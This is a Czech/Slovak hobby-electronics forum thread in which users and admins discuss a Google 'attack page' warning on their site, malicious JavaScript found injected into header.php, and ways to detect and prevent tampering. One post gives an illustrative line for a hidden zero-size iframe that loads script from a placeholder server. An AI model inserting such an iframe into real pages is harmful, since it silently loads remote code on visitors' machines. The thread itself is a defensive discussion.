Hlášení EB - škodliva/útočná stránka?

❓ Připomínky a dotazy pro administrátory a moderátory. Zde řešte problémy s přihlášením či heslem, můžete navrhnout otevření nové rubriky v diskuzním fóru či napsat případné připomínky k portálu nebo diskuzi.

Moderátor: Moderátoři

Zpráva
Autor
Uživatelský avatar
procesor
Příspěvky: 5284
Registrován: 02 říj 2009, 02:00
Bydliště: PO

Hlášení EB - škodliva/útočná stránka?

#1 Příspěvek od procesor »

Čo s tým...
Přílohy
EB_.JPG
(44.74 KiB) Staženo 331 x
EB2.JPG
Čo za nezmysly?
(130.62 KiB) Staženo 340 x

Uživatelský avatar
MetalGod
Příspěvky: 6556
Registrován: 30 kvě 2006, 02:00
Bydliště: Seč

#2 Příspěvek od MetalGod »

Že by se sem někdo zase nabořil? No, mně, co by linuxákovi, to žíly fakt nerve. Ale kouknu na kód.
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill

Uživatelský avatar
Hydrawerk
Příspěvky: 7678
Registrován: 13 pro 2011, 01:00
Bydliště: Earth

#3 Příspěvek od Hydrawerk »


Uživatelský avatar
helios
Příspěvky: 2914
Registrován: 08 srp 2007, 02:00
Bydliště: Tryskáčovo na Záhorí.

#4 Příspěvek od helios »

Na mňa to pred chvíľou tiež vyskočilo... 8O
Keď Vám hodia pod nohy polená, zakúrte s nimi.

Uživatelský avatar
ZVUK2000
Příspěvky: 3855
Registrován: 22 dub 2012, 02:00
Bydliště: Karvinsko

#5 Příspěvek od ZVUK2000 »

Já se ted mohu přihlásit jedině pomoci SZ. Jinak to hlásí škodlivá stránka :cry:

Uživatelský avatar
Hill
Administrátor
Administrátor
Příspěvky: 18898
Registrován: 10 zář 2004, 02:00
Bydliště: Jičín, Český ráj

#6 Příspěvek od Hill »

Vypadá to, že Google změnil stupeň důvěryhodnosti, takže vyžaduje snížit stupeň ochrany našich prohlížečů vypnutím blokování nahlášených útočných stránek.
Teď je otázka, jestli byla hrozba z Bastlírny skutečná (musel by tu být vložený odkaz na nebezpečné stránky), nebo jde o falešné hlášení.
Pravda, nestíhám kontrolovat všechna témata, natož všechny odkazy, ale i tak jich stíhám dost a na dvou počítačích neřval ani Avast Endpoint Protection Plus ani Norton (oba v plné a trvale aktualizované licenci).
Zkrátka víme o tom a pracuje se na tom.

Uživatelský avatar
alovka
Zakladatel fóra/superadmin
Zakladatel fóra/superadmin
Příspěvky: 286
Registrován: 29 črc 2002, 02:00
Bydliště: Ostrava
Kontaktovat uživatele:

#7 Příspěvek od alovka »

Minulý týden jsem odstraòoval škodlivý kód, který byl nìkým pøidán do záhlaví hlavní stránky a hlavní stránky fóra. Jednalo se o nìjaký javascript, který se automaticky spouštìl v prohlížeèi pøi rozjetí stránky. Antiviry to bìžnì zachytili.

Uživatelský avatar
galjo
Příspěvky: 1352
Registrován: 15 črc 2005, 02:00
Bydliště: záp.slovensko

#8 Příspěvek od galjo »

To je pravda - ja mám na stránke , kde chodí max 5 ludí tiež momentálne vyhodené - blokovaná stránka - Dôvod: Bola detekovaná hrozba (JS.IFrame.425)
a v navštevách stránky mám takéto niečo.... google-proxy-66-249-83-7.google.com - 20 návštev v priebehu týždňa.

Uživatelský avatar
ZdenekHQ
Administrátor
Administrátor
Příspěvky: 25593
Registrován: 21 črc 2006, 02:00
Bydliště: skoro Brno
Kontaktovat uživatele:

#9 Příspěvek od ZdenekHQ »

Protože odkaz na případný vir vede ze stránek EB, blokl paranoidní Google celou EB a spustil lavinu. Poslal jsem žádost o odstranění varování, s jejich rychlostí je to tak na týden.

Počet možných zjištěných útoků : 2

Jim je úplně jedno, koho a jak poškodí.

A další hlášení od Google : Googlebot found an extremely high number of URLs on your site. Co je jim do toho ?

Nejspíš je Google sám adept na BAN. :?

V případě lidí, co mají přístup do databáze či administrace či ftp nás čeká změna hesel, už nad nějakým přemýšlejte.

Alovko, a ty prosím ulož logy přístupů, když něco takovýho objevíš.
Naposledy upravil(a) ZdenekHQ dne 17 zář 2013, 15:57, celkem upraveno 1 x.
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?
]

Uživatelský avatar
rnbw
Příspěvky: 32312
Registrován: 21 bře 2006, 01:00
Bydliště: Bratislava

#10 Příspěvek od rnbw »

Google takto predsa "chrani" pouzivatelov. Nechava si z browseru (Firefox) posielat kazde URL a ak je na blackliste, tak browser zobrazi varovanie. Je to akoze pre dobro pouzivatelov. A Google len tak mimochodom sleduje, kto kam chodi a moze zablokovat lubovolny web...

Uživatelský avatar
MetalGod
Příspěvky: 6556
Registrován: 30 kvě 2006, 02:00
Bydliště: Seč

#11 Příspěvek od MetalGod »

alovka píše:Minulý týden jsem odstraňoval škodlivý kód, který byl někým přidán do záhlaví hlavní stránky a hlavní stránky fóra. Jednalo se o nějaký javascript, který se automaticky spouštěl v prohlížeči při rozjetí stránky. Antiviry to běžně zachytili.
Tak to bych udělal zálohu statických objektů, jejich kontrolní součty, ty pak periodicky kontroloval, a při neshodě nahradil modifikovaný soubory souborama ze zálohy, a přidaný soubory smazal. Tohle by měl umět třeba rsync. Změny by se pak měly provádět na stroji, kde je záloha.
Pokud někdo pozmění statickej obsah fóra, pak, když se bude kontrola provádět každou půlhodinu, útočníkův projev bude mít životnost při obrovský dávce štěstí právě onu hodinu.
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill

Uživatelský avatar
ZdenekHQ
Administrátor
Administrátor
Příspěvky: 25593
Registrován: 21 črc 2006, 02:00
Bydliště: skoro Brno
Kontaktovat uživatele:

#12 Příspěvek od ZdenekHQ »

Blbý je, že já jsem to už několikrát v minulých dnech kontroloval a vir veškerý žádný. Jestli byl i na EB a Alovka ho smázal, pak jsem to přehlédl, neboť už delší dobu řeším jednu stále více blbnoucí ženskou na hraně těžké závislosti na PC hrách versus jedno malé dítě, což je v podstatě každodenní problém, který se stále zhoršuje.

Google třeba hlásí příliš mnoho URL z adresy /ftp/, kam má přes robots.txt zakázaný chodit (a ví to) a naopak si stěžuje na neexistenci adresy http://www.ebastlirna.cz/forum/showthre ... readid=255 a žádá vyřešení, i když je to link starej jak existence EB samotná.
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?
]

Uživatelský avatar
MetalGod
Příspěvky: 6556
Registrován: 30 kvě 2006, 02:00
Bydliště: Seč

#13 Příspěvek od MetalGod »

Tam žádnej virus bejt nemusí, bylo by to moc okatý, stačí neškodnej JS, kterej si škodlivej kód stáhne odjinud. Nebo blbej iframe, okno do jinýho serveru. Vždyť co by měl vidět antivirák na tom, že kdesi v kódu fóra přibyl řádek viz dole?
<iframe src="http://www.server.tld/soubor.js" width="0" height="0"></iframe>
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill

Uživatelský avatar
ZdenekHQ
Administrátor
Administrátor
Příspěvky: 25593
Registrován: 21 črc 2006, 02:00
Bydliště: skoro Brno
Kontaktovat uživatele:

#14 Příspěvek od ZdenekHQ »

Pro mě je na EB virus jakýkoliv js kód, co neznám.

A příliš mnoho stránek je druhý problém, jen se to jaksi sešlo. Navíc si stěžoval getmefiles.net na přímé linky z EB, ty jsem deaktivoval.

Kdoví, jak se to všechno v Google poskládalo do sebe.
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?
]

Uživatelský avatar
alovka
Zakladatel fóra/superadmin
Zakladatel fóra/superadmin
Příspěvky: 286
Registrován: 29 črc 2002, 02:00
Bydliště: Ostrava
Kontaktovat uživatele:

#15 Příspěvek od alovka »

Ten škodlivý kód byl pøímo v header.php a ještì v jednom skriptu, který se vkládá (include) do fóra. Mrknul jsem na datumy zmìny souborù a šlo to najít hned. Byl tam pøímo nakopírovaný jeho celý zdrojový kód asi 3kB.

Zamčeno

Zpět na „Provoz fóra“